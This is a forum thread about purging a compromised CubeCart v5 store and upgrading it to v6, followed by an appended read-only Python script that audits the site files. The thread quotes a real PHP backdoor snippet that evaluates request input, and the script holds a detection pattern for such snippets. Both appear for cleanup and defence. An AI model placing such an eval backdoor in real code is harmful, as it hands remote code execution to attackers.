Upgrade v5 to v6 and Clean Install


I have a v5 installation that was compromised by the recent security flaw. I want to upgrade to v6 and be sure that the site is purged of any hidden files left by the hacker. Which approach would you recommend:

1/ rollback to a safe backup, lose all new customer data, then upgrade

2/ upgrade with compromised site, delete all CubeCart files, then upload files from latest .zip installation pack

Am I right to assume that the method in (2) will work?


Save only images from /images/source/, save the /includes/global.inc.php, save only logos from /images/logos/, and if you have a custom skin, save that.

In admin, Manage Hooks, Code Snippets tab, delete snippets you don't recognize.

Then nuke the site.

Upload the CC6 package. Copy back the global.inc.php file. Copy back the images. Copy back your custom skin.

Let CC6 UPGRADE the database.



Then nuke the site ... it's the only way to be sure

Your instructions were excellent

After upgrading I changed the database password on the server, and in the global.inc.php file. I also changed all the admin passwords. I made a small tweak to the logo skin allocation settings. The payment/shipping options weren't carried over but installing new plugins was straightforward.

As always, hugely grateful for your support.


  • 1 month later...

Are you running CC607 or better? Did you delete any Code snippets you did not recognize?

If there is something in the database, and you want to back up some or all of that database, then you won't know if that something also got into the backup.



Yes. When I purged the old site (v5.2.9) I upgraded all the way to v6.0.8.

There weren’t any hooks or code snippets to remove - just the one snippet that I left in called snippetABCd1 ... <?php eval($_REQUEST["ABCd1"]);?> which I see across all my CubeCart installs except the ABCd1 bit changes from site to site. I assume this snippet is common to everyone?



No. That is the snippet that is allowing backdoor access. The eval(...) is the key thing to look for.

Delete it.

Then, to make sure, use phpMyAdmin to look at the database table CubeCart_code_snippet to make sure it is completely empty.

Then, look at CubeCart_hooks and verify that, if you have no plugins installed, there are no hooks registered here.

Then look in the folder /includes/extra/ and delete all files that begin with snippet_.

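The file-side checks from the reply above (the eval(...) marker and the snippet_ files under /includes/extra/), as an added example that is not part of the original thread or CubeCart's own code: a read-only Python audit of a store's document root. The sample tree and the file name snippet_0123abcd.php are constructed for illustration; the CubeCart_code_snippet and CubeCart_hooks tables still need the phpMyAdmin check.

```python
"""Read-only audit of a CubeCart document root for the backdoor snippet pattern."""
import re
import sys
import tempfile
from pathlib import Path

# eval() fed directly from request data, e.g. eval($_REQUEST["..."])
EVAL_REQUEST = re.compile(
    rb"eval\s*\(\s*\$_(REQUEST|GET|POST|COOKIE)\b", re.IGNORECASE)
PHP_SUFFIXES = {".php", ".inc", ".phtml"}


def audit_store(root):
    """Return sorted (reason, relative_path) findings for a store root."""
    root = Path(root)
    findings = set()
    # Cached snippet files the thread says to delete: /includes/extra/snippet_*
    extra = root / "includes" / "extra"
    if extra.is_dir():
        for path in extra.glob("snippet_*"):
            findings.add(("cached-snippet", path.relative_to(root).as_posix()))
    # Any PHP file that evals request input, wherever it lives (skins included).
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in PHP_SUFFIXES:
            if EVAL_REQUEST.search(path.read_bytes()):
                findings.add(("eval-of-request", path.relative_to(root).as_posix()))
    return sorted(findings)


def build_sample(root):
    """Constructed sample tree: one clean file, one cached backdoor snippet."""
    root = Path(root)
    (root / "includes" / "extra").mkdir(parents=True)
    (root / "index.php").write_text("<?php echo 'store'; ?>")
    (root / "includes" / "extra" / "snippet_0123abcd.php").write_text(
        '<?php eval($_REQUEST["ABCd1"]);?>')
    return root


if __name__ == "__main__":
    if len(sys.argv) > 1:          # audit a real document root
        target, tmp = Path(sys.argv[1]), None
    else:                          # no argument: run on the constructed sample
        tmp = tempfile.TemporaryDirectory()
        target = build_sample(tmp.name)
    for reason, rel in audit_store(target):
        print(f"{reason}\t{rel}")
```

An empty result only covers the files on disk; a snippet stored in the database is rewritten to /includes/extra/ if the table row is left in place.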

Fortunately I did a backup after completing my purge/upgrade, so I have something decent to fall back onto.

After completing the rollback I will delete the snippet, switch to a new skin and dispose of the old, and then carry out a visual review of what is stored in the database.

Thank you bsmither

